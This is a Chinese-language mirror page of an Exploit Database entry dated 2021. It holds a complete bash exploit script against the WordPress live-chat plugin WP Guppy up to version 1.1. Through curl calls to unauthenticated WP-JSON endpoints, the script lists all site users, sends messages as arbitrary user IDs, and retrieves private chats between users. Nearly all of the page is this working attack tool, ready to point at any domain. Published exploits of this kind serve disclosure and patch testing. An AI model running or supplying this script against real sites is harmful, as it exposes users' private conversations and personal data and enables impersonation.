WordPress Plugin WP Guppy 1.1 – WP-JSON API Sensitive Information Disclosure

• Exploit Database
• 116 阅读

• 作者： Keyvan Hardani
  日期： 2021-11-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50540/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  # Exploit Title: WordPress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure # Exploit Author: Keyvan Hardani # Date: 22/11/2021 # Vendor Homepage: https://wp-guppy.com/ # Version: up to 1.1 # Tested on: Kali Linux - Windows 10 - WordPress 5.8.x and apache2 # Usage ./exploit.sh -h   #!/bin/bash   Help() { # Display Help echo "Usage" echo echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure" echo echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)" echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" echo "-h Print this Help." echo }   while getopts ":h" option; do case $option in h) # display Help Help exit;; esac done   if [ $1 == 1 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool fi   if [ $1 == 2 ] then curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool fi if [ $1 == 3 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool fi